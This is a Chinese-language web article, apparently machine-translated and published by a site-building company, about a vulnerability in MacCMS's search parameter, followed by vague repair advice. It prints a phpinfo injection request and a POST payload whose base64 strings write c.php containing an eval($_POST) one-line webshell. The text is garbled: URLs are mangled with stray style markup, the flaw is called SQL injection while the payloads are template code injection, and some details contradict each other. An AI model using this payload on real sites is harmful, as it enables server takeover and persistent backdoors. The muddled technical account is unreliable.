网站建设
当前位置:主页 > 建站资讯 > 网站建设 >
苹果cms网站漏洞修复解决方案
发布日期:2021-04-18 阅读次数: 字体大小:

苹果cms系统是许多电影网站当前使用的一组网站系统。 它是开源的,免费的,并且具有良好的可伸缩性。 它支持一键式收集,伪静态,高并发同时托管,并且受到许多网站管理员的青睐。 它是由网站安全检测maccms现有网站漏洞,sql注入盲射获取数据库的管理员帐户密码最近发现的,我们将仔细分析该漏洞的详细信息。
maccms漏洞分析并修复
苹果cms使用php语言开发的代码,使用的数据库为mysql类型。 该体系结构更常用并且相对稳定,但是存在更多的安全问题。 我这次发现的是sql注入漏洞,在网站根目录php代码下的inc文件中的module目录下是vod,如下图所示:

苹果cms网站漏洞修复解决方案


在代码中empty($wd函数),在判断是或否的逻辑过程中,为安全起见,将过滤前一次用户访问所带来的参数,我们将跟踪代码以查找配置 苹果cms。函数的文件。php配置文件代码李,该网站的所有请求方法(包括get,post,cookies)对于安全逃逸都是必不可少的。这里出现了网站漏洞问题
我们仔细地发现了,maccms使用360安全性提供的预防措施sql注入拦截代码。360sql注入预防措施是几年前开发并发布在Internet上的,长期未更新和维护,但仍存在sql注入代码的情况 绕过,当实体在参数值之间转换时,360的SQL拦截规则不会拦截空格和反斜杠,这可以通过 通过插入恶意参数并直接向苹果cms后端数据库请求以获取苹果cms用户帐户密码的管理。

苹果cms网站漏洞修复解决方案


让我们看一下如何利用苹果cms的漏洞。 从上面的漏洞的详细信息中,我们可以看到,这是因为在拦截sql注入语句的过程中存在可以绕开的漏洞。 让我们使用%0b和空格来注入代码。sql语句在拼接中,您可以插入反斜杠以报告单引号错误,从而绕过苹果cms的安全截获。 声明如下:GET请求:
https://www.jianzhanlong.com(建站龙) style="color:#a98175;">search&wd={if-A:phpinfo()} {endif-A}
可以直接获取php的具体信息
POST请求
可以直接获取webshell
https://www.jianzhanlong.com(建站龙) style="color:#a98175;">search
POST的内容如下 :
wd = {if-A:print(fputs%28fopen%28_decode%28Yy5waHA%29,w%29,_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)} {endif-A}

苹果cms网站漏洞修复解决方案


可以直接使用单句木马后门生成代码,文件名为www.jianzhanlong.com,单句木马链接密码为安全。
如何解决苹果cms网站漏洞
为了修复网站漏洞,我们需要知道漏洞的原因,以及为什么绕过苹果cms安全过滤,为什么使用maccmsaddslash安全函数安全过滤的原因,sql,并且in单词也很容易忘记添加引号。 在后处理安全性过滤器中,您可以插入单引号,stripslash可以添加单引号,编解码器引向旁路addslash,使用urldecode编码进行注入旁路,根据上述漏洞旁路,我们的SINE 修复此漏洞的安全建议是:url解码的双层转义,get,post,cookies的拦截规则的安全更新,加强对空格和百分号的拦截,如果您不熟悉该程序 代码,建议咨询专业网站安全公司以解决该问题。

标签:Searchsql注入语句PHP代码SQL注入漏洞webshellSQL注入sql语句苹果cmsCookiesaddslash安全函数maccms漏洞分析urldecode编码网站安全检测苹果cms系统sql注入盲射module目录stripslashmysql类型addslashURL解码maccmswd函数phpinfoSQL注入代码PHP语言empty